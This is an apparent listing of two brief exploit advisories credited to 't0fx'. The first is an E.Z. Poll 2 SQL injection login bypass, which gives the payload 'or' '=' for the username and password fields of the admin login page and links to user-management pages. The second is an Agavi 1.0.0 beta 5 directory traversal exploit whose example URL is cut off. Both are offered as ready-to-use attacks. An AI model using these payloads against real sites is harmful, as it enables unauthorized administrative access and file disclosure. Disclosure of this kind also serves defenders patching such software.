E.Z. Poll 2 - Authentication Bypass

E.Z. Poll 2 - Authentication Bypass Description: E.Z. Poll = v.2 script Remote SQL injection Exploit discovered by t0fx aka xtof69 vendor : E.Z. vulnerable page : http://www.site.com/admin/login.asp exploit : Username : 'or' '=' Password : 'or' '=' Add, modify user : /admin/admin-users.asp...

agavi-traverse.txt

AGAVI =Agavi 1.0.0 beta 5 Directory Transversal Exploit vendor : http://www.agavi.org/ affected versions : =Agavi 1.0.0 beta 5 latest found by t0fx // http://forum.europasecurity.org white hat crew // exploit : http://www.site.com/index.php?module=page&action=Display&pageref=pageref of the...